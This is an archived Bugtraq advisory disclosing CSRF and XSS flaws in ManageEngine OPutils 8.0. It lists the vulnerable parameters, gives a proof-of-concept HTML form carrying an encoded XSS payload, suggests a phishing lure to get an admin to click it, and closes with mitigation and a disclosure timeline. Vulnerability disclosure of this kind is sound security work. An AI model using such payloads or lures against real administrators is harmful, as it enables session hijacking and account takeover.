lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201602151738.u1FHcZfl010517@sf01web3.securityfocus.com>
Date: Mon, 15 Feb 2016 17:38:35 GMT
From: kingkaustubh@...com
To: bugtraq@...urityfocus.com
Subject: CSRF and XsS In Manage Engine oputils

==================================================
CSRF and XsS In Manage Engine oputils
==================================================

. contents:: Table Of Content

Overview
========

* Title : CSRF  and XSS In Manage Engine OPutils
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://www.manageengine.com/products/oputils/
* Severity: HIGH
* Version Affected: Version 8.0
* Version Tested : Version 8.0
* version patched: 

Advisory ID
============
2016-01-Manage_Engine

Description 
===========

About the Product
=================

OpUtils is a Switch Port & IP Address Management software that helps network engineers manage their Switches and IP Address Space with ease. With its comprehensive set of 30+ tools, it helps them to perform network monitoring tasks like detecting a rogue device intrusion, keep a check on bandwidth usage, monitoring availability of critical devices, backing up Cisco configuration files and more.


Vulnerable Parameter  
--------------------
1. RouterName	
2. action Form
3. selectedSwitchTab
4. ipOrHost
5. alertMsg
6. hostName 
7. switchID
8. oidString
 	
About Vulnerability
-------------------
This Application is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, admin?s browser can be made t do almost anything the admin user could typically do by hijacking admin's cookies etc.

Vulnerability Class
===================     
Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29)
Cross Site Scripting       (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS) 

Steps to Reproduce: (POC)
=========================

* Add follwing code to webserver and send that malicious link to application Admin.
* The admin should be loggedin when he clicks on the link.
* Soical enginering might help here 

For Example :- Device password has been changed click here to reset

####################CSRF COde#######################
<html>

  <body>

    <form action="http://192.168.1.10:7080/DeviceExplorer.cc">

      <input type="hidden" name="RouterName" value="kaus&quot;&gt;&lt;img&#32;src&#61;a&#32;onerror&#61;confirm&#40;&quot;Kaustubh&quot;&#41;&gt;tubh" />

      <input type="submit" value="Submit request" />

    </form>

  </body>

</html>



Mitigation 
==========
Upgrade to next service pack


Change Log
==========


Disclosure 
==========
28-January-2016 Reported to Developer
28-January-2016 Acknodlagement from developer
11-February-2016 Fixed by vendor ()

credits
=======
* Kaustubh Padwad 
* Information Security Researcher
* kingkaustubh@...com 
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ